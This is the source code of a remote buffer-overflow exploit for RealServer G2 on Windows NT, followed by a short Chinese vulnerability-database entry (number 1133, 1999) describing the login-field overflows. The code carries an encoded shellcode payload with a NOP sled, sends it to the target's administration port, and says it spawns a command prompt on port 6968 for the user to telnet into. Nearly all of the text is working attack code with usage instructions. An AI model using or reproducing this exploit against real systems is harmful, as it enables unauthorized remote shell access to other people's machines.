        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQ6wiQkJBXRToAkJCQkJCQkJCQkJCQkJCQkIt0JPiL/jPAUPf"

        "QUFnyr1mxxovHSIAwmeL6M/aWu5mcQEbB6whW/xOL0PwzybELSTLArITAdflSUVZSs5T/E"

        "6tZWuLsMsCshMB1+bOcVv8Ti9D8M8mxBjLArITAdflSUVZSs5T/E6tZWuLsg8YFM8BQQFB"

        "AUP9X6JNqEFZT/1fsagJT/1fwM8BXULAMq1irQKtfSFBXVq1W/1fASFBXrVatVv9XwEiwR"

        "IkHV/9XxDPAi0b0iUc8iUdAiwaJRzgzwGa4AQGJRyxXVzPAUFBQQFBIUFCtVjPAUP9XyP9"

        "28P9XzP92/P9XzEhQUFP/V/SL2DPAtARQwegEUP9X1IvwM8CLyLUEUFBXUVD/d6j/V9CDP"

        "wF8IjPAUFf/N1b/d6j/V9wLwHQvM8BQ/zdWU/9X+GpQ/1fg68gzwFC0BFBWU/9X/FczyVF"

        "QVv93rP9X2GpQ/1fg66pQ/1fkkNLcy9fc1aqrmdrr/Pjt/Mnw6fyZ3vztyu346+3s6dD3/"

        "/bYmdrr/Pjt/Mnr9vr86urYmdr19ur80fj3/fX8mcn8/PLX+PT8/cnw6fyZ3vX2+/j12PX"

        "19vqZzuvw7fzf8PX8mcv8+P3f8PX8mcr1/Pzpmdzh8O3J6/b6/Orqmc7K1trSqquZ6vb68"

        "vztmfvw9/2Z9fDq7fz3mfj6+vzp7Znq/Pf9mev8+u+Zm5mCoZmZmZmZmZmZmZmZmfr0/bf"

        "84fyZ/////w==\x0d\x0a\x0d\x0a\x00";





int

main (int argc, char **argv)

{

        int                     socket;

        char                    *server;

        unsigned short int      port;

        struct sockaddr_in      sa;



        if (argc != 3) {

                printf ("RealServer G2 exploit [NT] - please check http://www.beavuh.org for info.\n"

                        "by dark spyrit <dspyrit@beavuh.org>, port by team teso\n\n"

                        "usage: %s <host> <admin_port>\n"

                        "eg - %s host.com 6666\n"

                        "the exploit will spawn a command prompt on port 6968\n\n", argv[0], argv[0]);



                exit (EXIT_FAILURE);

        }



        server = argv[1];

        port = atoi (argv[2]);



        socket = net_connect (&sa, server, port, 45);

        if (socket <= 0) {

                perror ("net_connect");

                exit (EXIT_FAILURE);

        }



        write (socket, sploit, strlen (sploit));

        sleep (1);

        close (socket);



        printf ("data sent. try \"telnet %s 6968\" now \n", server);



        exit (EXIT_SUCCESS);

}





unsigned long int

net_resolve (char *host)

{

        long            i;

        struct hostent  *he;



        i = inet_addr (host);

        if (i == -1) {

                he = gethostbyname (host);

                if (he == NULL) {

                        return (0);

                } else {

                        return (*(unsigned long *) he->h_addr);

                }

        }



        return (i);

}





int

net_connect (struct sockaddr_in *cs, char *server,

        unsigned short int port, int sec)

{

        int             n, len, error, flags;

        int             fd;

        struct timeval  tv;

        fd_set          rset, wset;



        /* first allocate a socket */

        cs->sin_family = AF_INET;

        cs->sin_port = htons (port);

        fd = socket (cs->sin_family, SOCK_STREAM, 0);

        if (fd == -1)

                return (-1);



        cs->sin_addr.s_addr = net_resolve (server);

        if (cs->sin_addr.s_addr == 0) {

                close (fd);

                return (-1);

        }



        flags = fcntl (fd, F_GETFL, 0);

        if (flags == -1) {

                close (fd);

                return (-1);

        }

        n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);

        if (n == -1) {

                close (fd);

                return (-1);

        }



        error = 0;



        n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));

        if (n < 0) {

                if (errno != EINPROGRESS) {

                        close (fd);

                        return (-1);

                }

        }

        if (n == 0)

                goto done;



        FD_ZERO(&rset);

        FD_ZERO(&wset);

        FD_SET(fd, &rset);

        FD_SET(fd, &wset);

        tv.tv_sec = sec;

        tv.tv_usec = 0;



        n = select(fd + 1, &rset, &wset, NULL, &tv);

        if (n == 0) {

                close(fd);

                errno = ETIMEDOUT;

                return (-1);

        }

        if (n == -1)

                return (-1);



        if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {

                if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {

                        len = sizeof(error);

                        if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {

                                errno = ETIMEDOUT;

                                return (-1);

                        }

                        if (error == 0) {

                                goto done;

                        } else {

                                errno = error;

                                return (-1);

                        }

                }

        } else

                return (-1);



done:

        n = fcntl(fd, F_SETFL, flags);

        if (n == -1)

                return (-1);



        return (fd);

}
		

- 漏洞信息

1133
RealServer Administration Utility Multiple Login Field Overflows
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

1999-11-04 Unknow
1999-11-04 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站